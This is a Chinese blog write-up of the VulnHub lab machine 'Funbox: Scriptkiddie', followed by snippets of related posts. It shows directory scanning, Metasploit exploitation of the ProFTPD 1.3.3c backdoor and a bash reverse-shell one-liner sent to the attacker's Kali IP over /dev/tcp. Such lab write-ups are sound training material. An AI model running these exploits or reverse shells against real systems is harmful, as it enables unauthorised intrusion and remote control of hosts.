vulnhub之Funbox: Scriptkiddie

最新推荐文章于 2024-10-02 17:21:46 发布
最新推荐文章于 2024-10-02 17:21:46 发布
阅读量351 收藏
点赞数
分类专栏: 网络安全 文章标签: 系统安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qwweggfe/article/details/119976894
版权

靶机ip:192.168.181.155

kali IP : 192.168.181.129

首先进行IP扫描

 然后我查看ip端口开启哪些服务

 我们看见他开启了80端口,于是我们打开网页进行查看

 于是我进行目录探测,看看他有没有给我们一些提示

gobuster dir -u http://192.168.181.155/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

于是我认为他们开启了wordpress,于是我打开/wp-admin

 发现他确实有wp,于是我使用wpscan进行查看

wpscan --url http://192.168.181.155/wp-content/ -e --api-token ************

 好像不可以,于是我查看ip端口的协议是否有漏洞,当我查看第一个ftp时就发现有漏洞

 有远程命令执行的漏洞,于是我进行查看

https://www.rapid7.com/db/modules/exploit/unix/ftp/proftpd_133c_backdoor/

他告诉我漏洞利用过程

于是我打开msfconsole

 use 0

show options

  但是我们要增加一个payload

show payloads

 于是进行添加

set payload cmd/unix/reverse

 

于是对靶机进行攻击

rhost 是攻击靶机的ip

lhost 是kali的ip

 于是获得root权限

 于是我将他反弹到kali

bash -c 'bash -i >& /dev/tcp/192.168.181.129/9001 0>&1'

 于是才root目录下获得最终的flag

我带的我们
关注
专栏目录
vulnhub--Funbox: Scriptkiddie
venu_s的博客
08-16 721
靶机介绍 Difficult: As always, it’s a very easy box for beginners. Goal: Get flag Download:https://www.vulnhub.com/entry/funbox-scriptkiddie,725/ 信息探测 主机发现 netdiscover -i eth0 -r 192.168.0.128/24 端口扫描 nmap -sV -p- -A 192.168.0.131 nmap扫描结果 并不能用 anonymous
靶机:Funbox: Scriptkiddie
weixin_50339323的博客
09-14 440
一、信息收集 1. 获取靶机IP (在扫描靶机IP过程中扫不到IP,更改下靶机的配置文件) 2. 扫描端口 nmap -sC -sV 192.168.8.144 3. 进入web页面 4. 扫目录 发现网站是wordpress搭建的 二、漏洞利用&提权 1. 用wpscan扫描 1)枚举用户名 wpscan --url http://192.168.8.144/ --enunerate u 用户名有admin 2)爆破密码 wpscan ...
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox11(Scriptkiddie
Aluxian_的博客
09-21 1102
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。老样子需要找到flag即可。FunBox系列第十一个靶机了 也是最后一个比较简单1.信息收集 获取ip地址 和端口信息2.metasploit的基本操作3. 了解后门命令执行漏洞这是这个系列第十一个靶机啦 比较简单 希望对刚入门得小白有帮助!至此这个系列更新完啦!🙂。
靶场练习第二十天~vulnhub靶场之Funbox: Scriptkiddie
qq_57976347的博客
02-18 577
一、环境搭建 靶官网机下载地址:Funbox: Scriptkiddie ~ VulnHub 百度云盘下载链接: 百度网盘 请输入提取码 提取码: i4a9 二、信息收集 1.nmap命令扫描靶机 先用ifconfig查看kali的IP,因为kali和靶机都是NAT模式下,所以用 nmap 192.168.101.0/24 扫描得到靶机ip 再使用命令查看靶机开放的端口和协议:nmap -sV -A 192.168.101.112 2.利用扫描到端口 (1)开放21、22、8
FUNBOX: SCRIPTKIDDIE 靶场
小小猪的博客
09-09 543
获得python交互shell,查看文件。爆破目录,发现wp-admin目录。查看文件,发现proftpd利用方式。配置完成,执行,获得shell。nmap扫描靶机端口以及服务。配置完成,还需要导入监听模块。查看到21端口开放的服务。导入模块,查看相关配置。访问之后发现无法利用。
vulnhub--Funbox: Under Construction!
venu_s的博客
08-04 459
靶机介绍 Description: As always, it’s a very easy box for beginners. Download:https://www.vulnhub.com/entry/funbox-under-construction,715/ 信息探测 主机发现 netdiscover -i eth0 -r 192.168.187.0/24 端口扫描 nmap -sV -p- -A 192.168.187.177 目录扫描 gobuster dir -u http://19
Vulnhub-Funbox: Rookie(Funbox2)靶机渗透
m0_68117643的博客
07-07 1225
关于Funbox2这台靶机,运行在Vmware中无法获取靶机IP,尝试桥接、NAT、仅主机三种模式均无果,无奈转用VirtualBox,但NAT和桥接模式下也获取不到IP,仅在host-only模式下才可获取到靶机IP
vulnhub--Funbox: Lunchbreaker
venu_s的博客
07-27 390
靶机介绍 Description:It’s a box for beginners and can be pwned in the lunch break. Download:https://www.vulnhub.com/entry/funbox-lunchbreaker,700/ 信息探测 主机发现 netdiscover -i eth0 -r 192.168.187.0/24 端口扫描,开放了可以使用anonymous用户登录的21端口,以及22和80端口 目录扫描,有一个robots文件
靶机渗透练习32-Funbox11-Scriptkiddie
hirak0的博客
04-18 1214
靶机描述 靶机地址:https://www.vulnhub.com/entry/funbox-scriptkiddie,725/ Description As always, it’s a very easy box for beginners. Add to your /etc/hosts: funbox11 This works better with VirtualBox rather than VMware. 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.7 靶机: I
VulnHubFUNBOX: SCRIPTKIDDIE渗透
m0_73481504的博客
02-25 1102
1.需要收集信息,根据扫描出的结果做分析。2.了解使用msf渗透需要的步骤3.了解FTP的ProFTPD 1.3.3c漏洞利用。
Vulnhub 靶场】【Funbox: Scriptkiddie】【非常简单】【20210720】
惟忆
12-26 937
靶场介绍:https://www.vulnhub.com/entry/funbox-scriptkiddie,725/ 靶场下载:https://download.vulnhub.com/funbox/Funbox11.ova 靶场难度:简单 发布日期:2021年07月20日 文件大小:1.3 GB 靶场作者:0815R2d2 靶场系列:Funbox 打靶耗时:1+ 小时,极其的简单。
vulnhub刷题记录(Funbox: Scriptkiddie
ailx10
08-29 185
英文名称:Funbox: Scriptkiddie中文名称:FUNBOX:脚本小子发布日期:2021 年 7 月 20 日难度:容易描述:与往常一样,它对初学者来说是一个非常简单的盒子。添加到您的 /etc/hosts: funbox11下载地址:https://www.vulnhub.com/entry/funbox-scriptkiddie,725/ 1、主机发现主机发现2、端口扫描端口扫描...
HackTheBox - ScriptKiddie(CVE-2020-7384)
z4yn:)的博客
04-21 541
ScriptKiddie #0 信息收集 Namp 扫描端口,根据端口开放情况切入点应该在5000端口上。 ─[sg-vip-1]─[10.10.14.19]─[htb-z4yn@htb-2t3aamavbq]─[~] └──╼ [★]$ nmap 10.10.10.226 -p- Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-20 02:13 UTC Nmap scan report for 10.10.10.226 Host is up..
Hack The Box——ScriptKiddie
热门推荐
江左盟的博客
02-15 1万+
简介 信息收集 使用nmap扫描目标主机端口及服务信息,发现5000端口运行着Werkzeug httpd 0.16.1 (Python 3.8.5)服务,操作系统为Ubuntu,如图: 访问5000端口发现是简单的黑客工具页面,如图: 使用Google搜索发现Werkzeug Debug Shell远程代码执行漏洞,但是该靶机并不适用。使用该页面的nmap扫描127.0.0.1,发现目标主机运行Nmap 7.80版本,如图: 使用Google和exploit-db搜索该版本漏洞.
ScriptKiddie
T1me
03-07 339
HTB ScriptKiddie 简介 靶机名为脚本小子,os为Linux,难度不高 信息收集 nmap --min-rate 10000 -sV -p- 10.10.10.226 22和5000端口开放,可以看到运行着werkzeug,是一个WSGI工具包,首先查看一下是否存在已知的洞,发现并不适用。直接访问一手。 发现是一个工具库。漏洞就在其中。 漏洞寻找 首先看看nmap,发现时7.8,没什么可以利用的。 Venom看看有没有什么可利用的。 发现存在apk模版注入。 漏洞利用 msf利用起
funbox10靶机(命令执行漏洞)
m0_66299232的博客
11-21 623
7.这次把命令换为一个可以反弹shell的命令,观察这是php网页,所以执行命令也是用php支持执行的(谷歌php执行命令函数),我们用shell-exec , bash -c 是执行的意思。5.把base_url改为靶机地址,进行访问,网页给出的是一个ls 命令的结果(29行)1.没有可利用的信息和文件,我选择上传本地脚本进行探测(github里有pspy64)2.对扫出的catalog目录进行访问,并且发现其版本号。5.尝试登录root用户,成功登录,顺利拿下!虚拟机网络链接模式:桥接模式。
vulnstack(一) 红日靶场复现
BuNahua的博客
09-01 2865
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
funbox-vulnhub靶机-writeup
Lee
08-14 1609
FunBoxWriteup ##0x00 找到目标主机 使用nmap扫描网段,发现目标 nmap -sn 16.16.16.0/24 //发现目标机器IP为16.16.16.157 nmap -A 16.16.16.157 -v //直接nmap全扫 PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2
系统安全 - Linux /Docker 安全模型及实践
最新发布
小工匠
10-02 1250
Linux 安全体系的核心是正确的权限配置和最小权限原则的实践。通过配置合适的权限、使用非 root 账户运行服务,以及对日志的有效监控,可以大大提升系统的安全性。下一步将介绍如何使用 HIDS 等安全工具,为 Linux 系统提供额外的保护层。
FUNBOX: UNDER CONSTRUCTION!
08-16
- *1* *3* [vulnhub刷题记录(FUNBOX: UNDER CONSTRUCTION!)](https://blog.csdn.net/admin_gt/article/details/126722192)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值